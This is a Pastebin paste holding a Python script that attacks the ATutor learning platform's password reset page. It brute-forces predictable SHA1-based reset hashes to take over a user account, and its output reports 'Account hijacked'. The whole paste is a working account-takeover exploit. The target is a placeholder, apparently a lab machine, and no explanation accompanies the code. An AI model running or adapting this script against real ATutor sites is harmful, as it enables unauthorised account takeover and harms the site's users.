Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import hashlib, string, itertools, re, sys, requests, time
- from bs4 import BeautifulSoup
- def generate_hash(id, epoch, passLength):
- hashes = []
- #length of 10:
- #range(0, 10000000000)
- chars = range(0,10 ** passLength)
- for num in chars:
- to_hash = str(id + epoch + num)
- hash_bit = hashlib.sha1(to_hash.encode()).hexdigest()[5:5+15]
- hashes.append(hash_bit)
- return hashes
- def request_password(ip, id, passLength):
- count = 0
- current_epoch = int(((int(time.time()) / 60) / 60) / 24)
- max_epoch = int(current_epoch + 2)
- for epoch_day in range(current_epoch, max_epoch + 1):
- hashes = generate_hash(id, epoch_day, passLength)
- #hashes = ["8635fc4e2a0c7d9d2d9ee40ea8bf2edd76d5757e"]
- for ha in hashes:
- url = "http://" + ip + "/ATutor/password_reminder.php" + "?id=" + str(id) + "&g=" + str(current_epoch) + "&h=" + ha
- headers = {
- "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
- "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
- "Accept-Language": "en-US,en;q=0.5",
- "Accept-Encoding": "gzip, deflate",
- "Connection": "close",
- "Cookie": "ATutorID=8aj0h6fubpq098dpo4bq43me71; flash=no; _ga=GA1.1.915717465.1612720457; showDetails=on; _gid=GA1.1.310955516.1614421837; _gat=1"
- }
- proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
- try:
- proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
- r = requests.get(url, allow_redirects=False, proxies=proxies, headers=headers, verify=False, timeout=0.001)
- #count += 1
- soup = BeautifulSoup(r.text, 'html.parser')
- expected_text = "Password changed successfully. You may now login using the new password"
- if (r.status_code == 200 and expected_text in soup.text):
- return (True, ha, count, url)
- else:
- count += 1
- except Exception as e:
- print(f"{e}")
- return (False, "Nothing", count, "")
- def main():
- ip = "boxip"
- id = 1
- passLength = 10
- result, hash, count, url = request_password(ip, id, passLength)
- if(result):
- print (f"(+) Account hijacked via password reset {hash} using {count} requests!")
- else:
- print (f"(-) Account hijacking failed!")
- if __name__=="__main__":
- main()
Add Comment
Please, Sign In to add comment